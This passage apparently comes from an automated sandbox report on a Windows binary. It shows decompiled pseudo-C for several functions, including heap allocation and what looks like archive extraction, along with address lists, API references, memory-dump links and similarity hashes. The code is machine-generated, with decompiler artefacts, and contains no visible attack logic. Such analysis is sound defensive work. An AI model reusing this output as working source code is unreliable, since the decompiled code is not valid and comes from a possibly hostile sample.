									}
									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *(_t95 - 0x309e);
								}
								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
								asm("adc [esi+0x9c], ebx");
							}
							_t23 = _t95 - 0x9d58; // -38232
							E001F835C(_t93, _t88, _t23);
							_t50 =  *(_t93 + 8);
							_t89 = 0x49;
							_pop(_t90);
							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
							__eflags = _t80 - 0x54;
							if(_t80 == 0x54) {
								L11:
								 *((char*)(_t50 + 0x61f9)) = 1;
							} else {
								__eflags = _t80 - _t89;
								if(_t80 == _t89) {
									goto L11;
								}
							}
							_t51 =  *(_t93 + 8);
							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
								__eflags =  *((char*)(_t51 + 0x61f9));
								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
								E00200FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
							}
							_t33 = _t95 - 0x9d58; // -38232
							E001F1E4F(_t33, _t89);
							do {
								_t34 = _t95 - 0x9d58; // -38232
								_t53 = E001F391A(_t34, _t89);
								_t35 = _t95 - 0xd; // 0x7f3
								_t36 = _t95 - 0x9d58; // -38232
								_t55 = E001F83C0(_t93, _t36, _t53, _t35); // executed
								__eflags = _t55;
							} while (_t55 != 0);
						}
					} else {
						E001F6E03(0x2300e0, 1);
					}
				}
				_t37 = _t95 - 0x9d58; // -38232, executed
				E001F162D(_t37, _t90, _t93); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
				return 0;
			}


















          0x001f81c4
          0x001f81c4
          0x001f81c4
          0x001f81c4
          0x001f81c9
          0x001f81d3
          0x001f81d9
          0x001f81db
          0x001f81e4
          0x001f81e9
          0x001f81f4
          0x001f8201
          0x001f8209
          0x001f820f
          0x001f8216
          0x001f8229
          0x001f8230
          0x001f8237
          0x001f823a
          0x001f823c
          0x001f8242
          0x001f8249
          0x001f8250
          0x001f8257
          0x001f825c
          0x001f8277
          0x001f8283
          0x001f828a
          0x001f828f
          0x001f8295
          0x001f829a
          0x001f829c
          0x001f82a3
          0x001f82aa
          0x001f82af
          0x001f82b1
          0x00000000
          0x00000000
          0x001f8264
          0x001f826a
          0x001f8270
          0x001f8270
          0x001f82b3
          0x001f82b9
          0x001f82b9
          0x001f82bf
          0x001f82c8
          0x001f82cd
          0x001f82d2
          0x001f82d3
          0x001f82d4
          0x001f82dc
          0x001f82df
          0x001f82e6
          0x001f82e6
          0x001f82e1
          0x001f82e1
          0x001f82e4
          0x00000000
          0x00000000
          0x001f82e4
          0x001f82ed
          0x001f82f0
          0x001f82f7
          0x001f82f9
          0x001f8307
          0x001f8307
          0x001f830e
          0x001f830e
          0x001f8313
          0x001f8319
          0x001f831e
          0x001f831e
          0x001f8324
          0x001f8329
          0x001f832e
          0x001f8337
          0x001f833c
          0x001f833c
          0x001f831e
          0x001f8218
          0x001f821f
          0x001f821f
          0x001f8216
          0x001f8340
          0x001f8346
          0x001f8351
          0x001f835b

          APIs
          • __EH_prolog.LIBCMT ref: 001F81C9
            • Part of subcall function 001F137D: __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F137D: new.LIBCMT ref: 001F13FA
            • Part of subcall function 001F1973: __EH_prolog.LIBCMT ref: 001F1978
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: b2c97f09120631f06d6392339ee2768e7895106f5aa1d6fb7fdbe53132eb0a16
          • Instruction ID: d7022f6d2b4be1e6232eb5f0e0a8ab031fb2eff278fc196c5aa764974e9d3593
          • Opcode Fuzzy Hash: b2c97f09120631f06d6392339ee2768e7895106f5aa1d6fb7fdbe53132eb0a16
          • Instruction Fuzzy Hash: 9441627194065CAADB24EB61C855BFAB3B8AF50704F0504EAE649A3093DF74AFC8DB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00202A7F, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
          Download Yara Rule
          C-Code - Quality: 72%
          			E00202A7F(void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				void* _t29;
				signed int _t30;
				signed int* _t36;
				signed int _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				signed int _t44;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t67;
				void* _t69;
				void* _t73;

				_t56 = __edx;
				_t48 = __ecx;
				_t29 = E0020D870(E00221486, _t67);
				_push(_t48);
				_push(_t48);
				_t60 = _t48;
				_t44 = 0;
				_t72 =  *((intOrPtr*)(_t60 + 0x20));
				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
					_push(0x400400); // executed
					_t42 = E0020DB02(_t48, _t56, 0x400400, _t72); // executed
					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
					_t29 = E0020E920(_t60, _t42, 0, 0x400400);
					_t69 = _t69 + 0x10;
				}
				_t73 =  *(_t60 + 0x18) - _t44;
				if(_t73 == 0) {
					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
					_t30 = _t65;
					 *(_t67 - 0x10) = _t65;
					_t58 = _t30 * 0x4ae4 >> 0x20;
					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
					_t36 = E0020DB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
					_pop(0x2300e0);
					 *(_t67 - 0x14) = _t36;
					 *(_t67 - 4) = _t44;
					_t74 = _t36;
					if(_t36 != 0) {
						_push(E00201788);
						_push(E00201611);
						_push(_t65);
						_t16 =  &(_t36[1]); // 0x4
						_t44 = _t16;
						 *_t36 = _t65;
						_push(0x4ae4);
						_push(_t44);
						E0020D96D(_t58, _t74);
					}
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					 *(_t60 + 0x18) = _t44;
					_t29 = E0020E920(_t60, _t44, 0, _t65 * 0x4ae4);
					if(_t65 != 0) {
						_t38 = 0;
						 *(_t67 - 0x10) = 0;
						do {
							_t47 =  *(_t60 + 0x18) + _t38;
							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
								_t39 = E00212B53(0x2300e0); // executed
								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
								0x2300e0 = 0x30c00;
								if(_t39 == 0) {
									E001F6D3A(0x2300e0);
								}
								_t38 =  *(_t67 - 0x10);
							}
							_t38 = _t38 + 0x4ae4;
							 *(_t67 - 0x10) = _t38;
							_t65 = _t65 - 1;
						} while (_t65 != 0);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
				return _t29;
			}




















          0x00202a7f
          0x00202a7f
          0x00202a84
          0x00202a89
          0x00202a8a
          0x00202a8e
          0x00202a90
          0x00202a92
          0x00202a95
          0x00202a9c
          0x00202a9d
          0x00202aa5
          0x00202aa8
          0x00202aad
          0x00202aad
          0x00202ab0
          0x00202ab3
          0x00202abe
          0x00202ac5
          0x00202ac7
          0x00202aca
          0x00202adf
          0x00202ae0
          0x00202ae5
          0x00202ae6
          0x00202ae9
          0x00202aec
          0x00202aee
          0x00202af0
          0x00202af5
          0x00202afa
          0x00202afb
          0x00202afb
          0x00202afe
          0x00202b00
          0x00202b05
          0x00202b06
          0x00202b06
          0x00202b0b
          0x00202b15
          0x00202b1c
          0x00202b26
          0x00202b28
          0x00202b2a
          0x00202b2d
          0x00202b30
          0x00202b39
          0x00202b40
          0x00202b4a
          0x00202b4f
          0x00202b55
          0x00202b58
          0x00202b5f
          0x00202b5f
          0x00202b64
          0x00202b64
          0x00202b67
          0x00202b6c
          0x00202b6f
          0x00202b6f
          0x00202b2d
          0x00202b26
          0x00202b7a
          0x00202b84

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: a91a5ade47aa2f03db015b8cb26474f4e1c72ed70c841027712d1d5b60c3db0a
          • Instruction ID: 3e54c4cb41262a0ce0c1ba4ff8fd40b47db5a07d059f6806bf87ed4845a6dd44
          • Opcode Fuzzy Hash: a91a5ade47aa2f03db015b8cb26474f4e1c72ed70c841027712d1d5b60c3db0a
          • Instruction Fuzzy Hash: A32106B1E61316ABDB14DFB48C45B6A77A8FB05318F00463AE505EB6C3D7709920CAA8
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209EEF, Relevance: 1.6, APIs: 1, Instructions: 71COMMON
          Download Yara Rule
          C-Code - Quality: 83%
          			E00209EEF(void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				short _t33;
				char _t36;
				void* _t47;
				void* _t50;
				short _t55;
				void* _t57;
				void* _t58;
				short _t60;
				void* _t62;
				intOrPtr _t64;
				void* _t67;

				_t67 = __eflags;
				_t57 = __edx;
				_t47 = __ecx;
				E0020D870(E002214E1, _t62);
				_push(_t47);
				E0020D940();
				_push(_t60);
				_push(_t58);
				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
				 *((intOrPtr*)(_t62 - 4)) = 0;
				E001F137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
				 *((char*)(_t62 - 4)) = 1;
				E001F1E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
					 *((intOrPtr*)(_t62 - 0x24)) = 0;
					 *((intOrPtr*)(_t62 - 0x20)) = 0;
					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
					 *((intOrPtr*)(_t62 - 0x18)) = 0;
					 *((char*)(_t62 - 0x14)) = 0;
					 *((char*)(_t62 - 4)) = 2;
					_t50 = _t62 - 0x7d24;
					_t33 = E001F192E(_t57, _t62 - 0x24);
					__eflags = _t33;
					if(_t33 != 0) {
						_t60 =  *((intOrPtr*)(_t62 - 0x20));
						_t58 = _t60 + _t60;
						_push(_t58 + 2);
						_t55 = E00212B53(_t50);
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
						__eflags = _t55;
						if(_t55 != 0) {
							__eflags = 0;
							 *((short*)(_t58 + _t55)) = 0;
							E0020EA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
						} else {
							_t60 = 0;
						}
						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
					}
					E001F15E3(_t62 - 0x24);
					E001F162D(_t62 - 0x7d24, _t58, _t60); // executed
					_t36 = 1;
				} else {
					E001F162D(_t62 - 0x7d24, _t58, _t60);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t36;
			}
















          0x00209eef
          0x00209eef
          0x00209eef
          0x00209ef4
          0x00209ef9
          0x00209eff
          0x00209f05
          0x00209f06
          0x00209f09
          0x00209f13
          0x00209f16
          0x00209f24
          0x00209f28
          0x00209f33
          0x00209f44
          0x00209f47
          0x00209f4a
          0x00209f4d
          0x00209f50
          0x00209f56
          0x00209f5b
          0x00209f61
          0x00209f66
          0x00209f68
          0x00209f6a
          0x00209f6d
          0x00209f73
          0x00209f7a
          0x00209f7f
          0x00209f81
          0x00209f83
          0x00209f89
          0x00209f8c
          0x00209f94
          0x00209f85
          0x00209f85
          0x00209f85
          0x00209f9f
          0x00209f9f
          0x00209fa4
          0x00209faf
          0x00209fb4
          0x00209f35
          0x00209f3b
          0x00209f40
          0x00209f40
          0x00209fbb
          0x00209fc6

          APIs
          • __EH_prolog.LIBCMT ref: 00209EF4
            • Part of subcall function 001F137D: __EH_prolog.LIBCMT ref: 001F1382
            • Part of subcall function 001F137D: new.LIBCMT ref: 001F13FA
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: ad95a4087a1d58be197e33b2b7d187c83e12b9225ba7c1f9f49d64a98c3b0318
          • Instruction ID: da89fcf4228c622d10970abcea19215f128fa10eb87533fdfb9f2584fa33e56c
          • Opcode Fuzzy Hash: ad95a4087a1d58be197e33b2b7d187c83e12b9225ba7c1f9f49d64a98c3b0318
          • Instruction Fuzzy Hash: 70218B71D1424EEACF14DF94C9819FEB7B4BF29310F0000AAE80AA7243D7756E55CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F910B, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
          Download Yara Rule
          C-Code - Quality: 67%
          			E001F910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				void* _t21;
				intOrPtr _t22;
				intOrPtr _t27;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t40;
				void* _t42;
				void* _t49;

				_t35 = __edx;
				E0020D870(E00221321, _t42);
				E001F6ED7(_t42 - 0x20, E001F7C3C());
				_push( *((intOrPtr*)(_t42 - 0x1c)));
				_push( *((intOrPtr*)(_t42 - 0x20)));
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t40 = E001FC70F();
				if(_t40 > 0) {
					_t27 =  *((intOrPtr*)(_t42 + 0x10));
					_t37 =  *((intOrPtr*)(_t42 + 0xc));
					do {
						_t22 = _t40;
						asm("cdq");
						_t49 = _t35 - _t27;
						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
							_t40 = _t37;
						}
						if(_t40 > 0) {
							E001FC8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
							asm("cdq");
							_t37 = _t37 - _t40;
							asm("sbb ebx, edx");
						}
						_push( *((intOrPtr*)(_t42 - 0x1c)));
						_push( *((intOrPtr*)(_t42 - 0x20)));
						_t40 = E001FC70F();
					} while (_t40 > 0);
				}
				_t21 = E001F159C(_t42 - 0x20); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t21;
			}











          0x001f910b
          0x001f9110
          0x001f9122
          0x001f9127
          0x001f912d
          0x001f9130
          0x001f9139
          0x001f913d
          0x001f9140
          0x001f9144
          0x001f9147
          0x001f9147
          0x001f9149
          0x001f914a
          0x001f914c
          0x001f9154
          0x001f9154
          0x001f9158
          0x001f9161
          0x001f9168
          0x001f9169
          0x001f916b
          0x001f916b
          0x001f916d
          0x001f9173
          0x001f917b
          0x001f917d
          0x001f9182
          0x001f9186
          0x001f918f
          0x001f9199

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 4228bd4277faeb8966f3ce4916aaa5b7cbf2a208a9e488854bcbf8fbb2d428f5
          • Instruction ID: 0b19ede8c7b1fabf7b2a85fad58ac4c305effa18c2258728541e5dbf06d17c8f
          • Opcode Fuzzy Hash: 4228bd4277faeb8966f3ce4916aaa5b7cbf2a208a9e488854bcbf8fbb2d428f5
          • Instruction Fuzzy Hash: 2211E177E0042DABCF12BBA8CD41AFEB736AF98350F054125FA04A7252CB308D148BE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C6FF, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
          Download Yara Rule
          C-Code - Quality: 80%
          			E0020C6FF(void* __ecx, void* __eflags) {
				void* __ebx;
				intOrPtr _t18;
				char _t19;
				char _t20;
				void* _t23;
				void* _t24;
				void* _t26;
				void* _t37;
				void* _t43;
				intOrPtr _t45;

				_t26 = __ecx;
				E0020D870(E00221520, _t43);
				_push(_t26);
				E0020D940();
				_push(_t24);
				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
				E00214D7E(0x2439fa, "X");
				E001FFB08(0x245a1c, _t37, 0x2222e0);
				E00214D7E(0x244a1a,  *((intOrPtr*)(_t43 + 0xc)));
				E001F5A9F(0x23b708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
				_t4 = _t43 - 4;
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t18 = 2;
				 *0x2429d8 = _t18;
				 *0x2429d4 = _t18;
				 *0x2429d0 = _t18;
				_t19 =  *0x2375d4; // 0x0
				 *0x24185b = _t19;
				_t20 =  *0x2375d5; // 0x1
				 *0x241894 = 1;
				 *0x241897 = 1;
				 *0x24185c = _t20;
				E001F7ADF(_t43 - 0x2108, _t37,  *_t4, 0x23b708);
				 *(_t43 - 4) = 1;
				E001F7C55(_t43 - 0x2108, _t37,  *_t4);
				_t23 = E001F7B71(_t24, _t43 - 0x2108, _t37); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t23;
			}













          0x0020c6ff
          0x0020c704
          0x0020c709
          0x0020c70f
          0x0020c714
          0x0020c717
          0x0020c724
          0x0020c735
          0x0020c742
          0x0020c753
          0x0020c758
          0x0020c758
          0x0020c764
          0x0020c765
          0x0020c76a
          0x0020c76f
          0x0020c774
          0x0020c779
          0x0020c77e
          0x0020c784
          0x0020c78b
          0x0020c792
          0x0020c797
          0x0020c7a2
          0x0020c7a6
          0x0020c7b1
          0x0020c7bb
          0x0020c7c6

          APIs
          • __EH_prolog.LIBCMT ref: 0020C704
            • Part of subcall function 001F7ADF: __EH_prolog.LIBCMT ref: 001F7AE4
            • Part of subcall function 001F7ADF: new.LIBCMT ref: 001F7B28
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prolog
          • String ID:
          • API String ID: 3519838083-0
          • Opcode ID: 222c48c759b6056e52d6150786c3220fdb2eb8e3aacbab92b2a45047f32eb193
          • Instruction ID: 0437a9d1e17f1c2ad056fef6bafab9a02e1b3c7c4a7dfa826989da1141b1ac73
          • Opcode Fuzzy Hash: 222c48c759b6056e52d6150786c3220fdb2eb8e3aacbab92b2a45047f32eb193
          • Instruction Fuzzy Hash: 1B11EB75529254AED705EBA4F80ABEC7BE0DB76310F00405BF50857293DBB116A4CB61
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021B0DB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
          Download Yara Rule
          C-Code - Quality: 91%
          			E0021B0DB(void* __edx, void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t31;
				char _t32;
				void* _t34;
				intOrPtr* _t36;

				_push(_t26);
				_push(_t26);
				_t16 = E00217B1B(_t26, 0x40, 0x30); // executed
				_t32 = _t16;
				_v12 = _t32;
				_t28 = _t31;
				if(_t32 != 0) {
					_t2 = _t32 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t32 - _t17;
					if(__eflags != 0) {
						_t3 = _t32 + 0x20; // 0x20
						_t36 = _t3;
						_t34 = _t17;
						do {
							_t4 = _t36 - 0x20; // 0x0
							E00219C02(_t28, _t36, __eflags, _t4, 0xfa0, 0);
							 *(_t36 - 8) =  *(_t36 - 8) | 0xffffffff;
							 *_t36 = 0;
							_t36 = _t36 + 0x30;
							 *((intOrPtr*)(_t36 - 0x2c)) = 0;
							 *((intOrPtr*)(_t36 - 0x28)) = 0xa0a0000;
							 *((char*)(_t36 - 0x24)) = 0xa;
							 *(_t36 - 0x23) =  *(_t36 - 0x23) & 0x000000f8;
							 *((char*)(_t36 - 0x22)) = 0;
							__eflags = _t36 - 0x20 - _t34;
						} while (__eflags != 0);
						_t32 = _v12;
					}
				} else {
					_t32 = 0;
				}
				E00217A50(0);
				return _t32;
			}













          0x0021b0e0
          0x0021b0e1
          0x0021b0e8
          0x0021b0ed
          0x0021b0f1
          0x0021b0f5
          0x0021b0f8
          0x0021b0fe
          0x0021b0fe
          0x0021b104
          0x0021b106
          0x0021b109
          0x0021b109
          0x0021b10c
          0x0021b10e
          0x0021b114
          0x0021b118
          0x0021b11d
          0x0021b121
          0x0021b123
          0x0021b126
          0x0021b12c
          0x0021b133
          0x0021b137
          0x0021b13b
          0x0021b13e
          0x0021b13e
          0x0021b142
          0x0021b145
          0x0021b0fa
          0x0021b0fa
          0x0021b0fa
          0x0021b147
          0x0021b154

          APIs
            • Part of subcall function 00217B1B: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 00217B5C
          • _free.LIBCMT ref: 0021B147
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AllocateHeap_free
          • String ID:
          • API String ID: 614378929-0
          • Opcode ID: 716850c2e0a7a2cb9eae644337a9ab78ac2f4097770ce849c3152d41cd1ba7f1
          • Instruction ID: 47ea6f620e90e7dabcbfe6396815e1d00041ad72225aa7e8b76b1a6cf7122d4e
          • Opcode Fuzzy Hash: 716850c2e0a7a2cb9eae644337a9ab78ac2f4097770ce849c3152d41cd1ba7f1
          • Instruction Fuzzy Hash: D3014E72214305ABE331CF65D88699AFBF9EBD5370F25051DE19453280E730A945C774
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00217B1B, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 95%
          			E00217B1B(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t16;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x250874, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00217906();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00217ECC())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00216763(_t15, _t16, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				_t16 = _t13 % _t18;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}











          0x00217b1b
          0x00217b21
          0x00217b26
          0x00217b34
          0x00217b34
          0x00217b3a
          0x00217b3c
          0x00217b3c
          0x00217b53
          0x00217b5c
          0x00217b64
          0x00000000
          0x00000000
          0x00217b44
          0x00217b46
          0x00217b68
          0x00217b6d
          0x00217b73
          0x00000000
          0x00217b73
          0x00217b49
          0x00217b4e
          0x00217b4f
          0x00217b51
          0x00000000
          0x00000000
          0x00217b51
          0x00000000
          0x00217b53
          0x00217b2c
          0x00217b2d
          0x00217b32
          0x00000000
          0x00000000
          0x00000000

          APIs
          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 00217B5C
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AllocateHeap
          • String ID:
          • API String ID: 1279760036-0
          • Opcode ID: c1b6896cb5aa6de259e16d4e57e13910b42dc41552c418315b4167e2a2dba651
          • Instruction ID: cec026be6e06d6e7a1fc353e7bdcb35995f46af139e9360b14767147a767bbf4
          • Opcode Fuzzy Hash: c1b6896cb5aa6de259e16d4e57e13910b42dc41552c418315b4167e2a2dba651
          • Instruction Fuzzy Hash: 28F0B43167D2266A9B221E219C05EDB37E99FF0768F148111BC149B294CB30DEA1C6E4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F5A1D, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
          Download Yara Rule
          C-Code - Quality: 94%
          			E001F5A1D(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t25;
				intOrPtr _t34;
				void* _t36;

				_t25 = __ecx;
				E0020D870(E00221216, _t36);
				_push(_t25);
				_t34 = _t25;
				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
				E001FAD1B(_t25); // executed
				_t2 = _t36 - 4;
				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
				E001FFAE6();
				 *(_t36 - 4) = 1;
				E001FFAE6();
				 *(_t36 - 4) = 2;
				E001FFAE6();
				 *(_t36 - 4) = 3;
				E001FFAE6();
				 *(_t36 - 4) = 4;
				E001FFAE6();
				 *(_t36 - 4) = 5;
				E001F5C12(_t34,  *_t2);
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t34;
			}






          0x001f5a1d
          0x001f5a22
          0x001f5a27
          0x001f5a29
          0x001f5a2b
          0x001f5a2e
          0x001f5a33
          0x001f5a33
          0x001f5a3d
          0x001f5a48
          0x001f5a4c
          0x001f5a57
          0x001f5a5b
          0x001f5a66
          0x001f5a6a
          0x001f5a75
          0x001f5a79
          0x001f5a80
          0x001f5a84
          0x001f5a8f
          0x001f5a99

          APIs
          • __EH_prolog.LIBCMT ref: 001F5A22
            • Part of subcall function 001FAD1B: __EH_prolog.LIBCMT ref: 001FAD20
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
